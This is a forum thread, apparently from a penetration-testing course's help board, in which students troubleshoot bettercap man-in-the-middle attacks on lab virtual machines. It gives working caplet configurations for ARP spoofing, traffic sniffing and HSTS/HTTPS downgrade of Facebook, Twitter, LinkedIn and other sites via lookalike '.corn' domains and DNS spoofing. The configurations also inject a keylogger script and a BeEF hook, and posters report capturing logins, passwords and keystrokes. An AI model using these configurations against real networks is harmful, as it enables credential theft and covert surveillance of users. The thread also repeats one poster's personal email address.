Actually, I meant the documentation of the alternatives
1 Like
I 've encountered the same issue.
Spoofing worked but the https downgrade failed.
At the moment I got everything to work, except for login and password capture in https-websites.
I set my spoof.cap to:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.target 192.168.0.217
arp.spoof on
set net.sniff.local true
set net.sniff.output stored_output.cap
net.sniff on
I ran the spoof:
sudo bettercap iface eth0 -caplet /root/spoof.cap
Checked if it worked, using command help.
Then I already checked the connection by generation traffic on the Windows VM.
And after that traffic was captured in kali.
Then I entered the command:
hstshijack/hstshijack
And then suddenly it did work…
at first the hsts-downgrade failed, because f.i. Facebook.corm gave an error message, so I downgraded to Bettercap 2.23 as shown by AJS.
Then I restarted both Linux VM and Windows VM (target).
And after that also hsts-downgraded website loaded.
And I can capture login and password input.
Only problem is I can’t get the key capture to work for downgraded https websites.
I m gonna try putting some websites in the hstshijack file.
I found an error in the hstshijack.cap as well for linkedin, I think.
hstshijack.targets: www.linkedin.com
hstshijack.replacements: linkedin.com
that should be different I thought.
So I changede it to *.linkedin.com for targets
and *.linkedin.corn for replacements and dns spoof domains.
The downgrade only works when used in http://google.com
https://google.com doesn’t do the trick.
And on bing almost no websites are downgraded.
Luckily google.com does get downgraded on bing.
I don’t get key stroke registration on Linkedin though
But I do so on Facebook and most of the times on Twitter.corn.
The system works but is not entirely stable…
update. I do get https downgrade to work.
But the examples Zaid uses in the course are currently HSTS instead of “regular” https.
Linkedin, Twitter are hsts at the moment.
I have the same problem and I still have not fixed it I changed my spoof.cap file to yours by adding “set net.sniff.output stored_output.cap”. which was the only difference between our spoof.cap files. but it still did not work. could you please explain how you fixed it so the login feature works when the hsts files have been downgraded and could you share your hstshijack file that made it work
thanks somkene
Hi Somkene,
I have set up hstshijack.cap as such:
"
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets twitter.com,.twitter.com,facebook.com,.facebook.com,apple.com,.apple.com,ebay.com,.ebay.com,.linkedin.com
set hstshijack.replacements twitter.corn,.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,.linkedin.corn
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js, *:/usr/share/bettercap/caplets/hstshijack/inject-beef.js
set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains twitter.corn,.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,*.linkedin.corn
http.proxy on
dns.spoof on
"
Which version fo Bettercap do you use?
Did you try downgrading to Bettercap 2.23 as shown by AJS in the post above?
yes I downgraded to bettercap 2.23
Hey can you please attach a link or file of older version ( 2.23 ) of Bettercap here. Coz I’m not able to find it anywhere. Plz reply if you see it.
Hey can you please attach a link or file of older version ( 2.23 ) of Bettercap here. Coz I’m not able to find it anywhere. Plz reply if you see it…
bro i have the same problem did you solve it ?
nope!!! which one ???
i need your help because i could not solve the sub, i have the latest version of kali linux and the latest bettercap version
I followed the video that is on the ZAID course but the problem persists
I couldn’t find the solution to downgrade to bettercap version 2.23
I downloaded version 2.23 but when I run it I can’t run the htstshijack,
could you help me to unblock this problem?
thank you…
Bruh. Please help me out. I’m so badly stuck in this bettercap lecture for forever. PLEASE.
Equal behaviour here.
Revised all 2 times.
As recommended Kali-zSecurity never updated.
2 target-VM’s machines: Windows 10 fully updated, and Windows 7 never updated (to see if was a new defense in Windows code).
Equal results for both target-VM’s, so it is not a new Windows-code defense.
What is different from what was said before:
1- apple and linkedin go to http
2- facebook, twitter go to https
3- casual trying some other sites: 90% go to https, 10% go to http
4- informations in bettercap command line (with “Non-Existent Domain” in red ):
4.a. “10.0.2.0/24 > 10.0.2.42 » [17:05:35] [net.sniff.dns] dns 10.161.0.1 > local : 1.2.0.10.in-addr.arpa is Non-Existent Domain”
4.b. “10.0.2.0/24 > 10.0.2.42 » [17:05:36] [net.sniff.dns] dns 10.161.0.1 > 10.0.2.47 : teredo.ipv6.microsoft.com is Non-Existent Domain”
Stopped my lessons here; I’ll go forward when this is solved, or an alternative method is teached.
have u got any solution???im also stucked in this topic about 5 days
akjoker18@gmail.com
contact me ASAP
have u got any solution???im also stucked in this topic about 5 days
akjoker18@gmail.com
contact me ASAP
have u got any solution???im also stucked in this topic about 5 days
akjoker18@gmail.com
contact me ASAP…